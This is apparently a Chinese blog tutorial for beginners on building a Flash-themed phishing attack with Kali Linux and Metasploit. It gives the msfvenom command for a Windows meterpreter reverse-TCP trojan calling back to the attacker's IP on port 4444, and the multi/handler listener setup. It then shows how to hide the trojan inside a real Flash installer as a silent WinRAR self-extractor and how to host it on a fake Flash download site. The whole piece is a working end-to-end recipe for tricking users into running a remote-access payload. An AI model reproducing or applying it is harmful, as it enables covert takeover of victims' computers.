xss——flash钓鱼 (kali MSF捆绑钓鱼)超详细!小白也可以!
kali系统虚拟机(攻击者监听设备、制作木马),Win10物理机(受害者目标主机),winrar压缩软件(用于伪装木马),phpstudy(搭建模拟钓鱼网站)
目录
(1)两个⽂件⼀块压缩并更改⽂件名为"Download.exe",点击"⾼级"标签⻚下的"⾃解压选项"填写解压路径为 C:\Windows\Temp
(2)点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏"...
(3)配置更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件!!
主要环境准备:
kali系统虚拟机(攻击者监听设备、制作木马),Win10物理机(受害者目标主机),winrar压缩软件(用于伪装木马),phpstudy(搭建模拟钓鱼网站)
整体思路:
详细步骤:
1.在kali中利用MSF生成一个PayLoad
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.252.129 LPORT=44
44 -f exe > shell.exe
//192.168.252.129 是你kali监听设备的ip地址 端口我选择的4444
msfvenom
: 这是Metasploit框架中的一个工具,用于生成各种类型的payloads。
-p
: 这个选项用来指定payload类型。在这里,payload类型为windows/x64/meterpreter/reverse_tcp
,表示生成的是针对x64架构的Windows系统、使用Meterpreter功能的、通过反向TCP连接回连到攻击者的payload。
LHOST=192.168.252.129
: 这个参数指定了监听主机的IP地址,payload生成的shellcode将回连到这个IP地址。
LPORT=4444
: 这个参数指定了监听端口,payload生成的shellcode将尝试在这个端口上建立连接。
-f exe
: 这个参数指定了输出格式,这里设置为exe
,意味着生成的payload将是一个Windows可执行文件。
>shell.exe
: 这表示输出文件名,msfvenom
生成的payload将被保存为名为shell.exe
的文件。
运行完会在当前目录下生成一个shell.exe 文件 然后将其拖到你的物理机上 进行后续的伪装捆绑
2.kali中开启监听
上一步我们生成了一个可执行木马 现在我们要在kali 中开启该木马的监听
在kali 中依次输入以下语句
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.252.129
set lport 4444
run
msfconsole
: 这是启动Metasploit控制台的命令,从这里你可以执行各种渗透测试和安全评估任务。
use exploit/multi/handler
: 这条命令选择了exploit/multi/handler
模块,这是一个通用的监听器模块,可以用来接收任何类型的payload发送的连接请求。
set payload windows/x64/meterpreter/reverse_tcp
: 这里设置了payload类型为windows/x64/meterpreter/reverse_tcp
,这意味着你期望接收到由这种类型payload生成的连接。
set lhost 192.168.252.129
: 设置监听的IP地址为192.168.252.129
,这是你的机器或服务器的本地IP地址,payload将回连到这个地址。
set lport 4444
: 设置监听的端口号为4444
,payload将尝试在这个端口上建立连接。
run
: 最后运行这个配置好的监听器,开始等待payload的连接。
显示如下就是进入了监听等待连接界面
3.伪装木马
因为我们要将木马伪装到flash的解压包中 所以我们先去flash下载一个真的flash安装包 下载链接在下面
https://www.flash.cn/download-wins
下载完后我们就有两个文件 一个木马文件一个真的安装包
我们利用winRAR的自定义解压将两个文件合成一个可执行文件
(1)两个⽂件⼀块压缩并更改⽂件名为"Download.exe",点击"⾼级"标签⻚下的"⾃解压选项"填
写解压路径为 C:\Windows\Temp
(2)点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏"...
(3)配置更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件!!
然后我们就得到了两个文件合一起的可执行文件
4.搭建flash的网站并修改其下载文件
下载以下项⽬并将其源码⽂件部署在⽹站根⽬录下...稍作修改并访问
https://github.com/crow821/crowsec/tree/master/crowsec_FakeFlash
我们将源码文件部署在网站的WWW根目录下
然后查看了index.html文件中的下载路径 发现其文件名 为了方便我们将我们的木马文件改成他的原本的文件名字 再将其原本正确的文件删掉 就是替换了他正确的下载文件
修改后的样子:
5.去搭建的网站下载我们的木马并运行
记得先运行我们下载搭建好的flash网站
因为搭建在网站根目录下 所以我直接访问了本机
点击下载就会下载咱们的木马文件了
下载下来点击运行 返回kali监听机就会发现目标机已上线 并且可以执行目标电脑的shell
更多推荐
所有评论(0)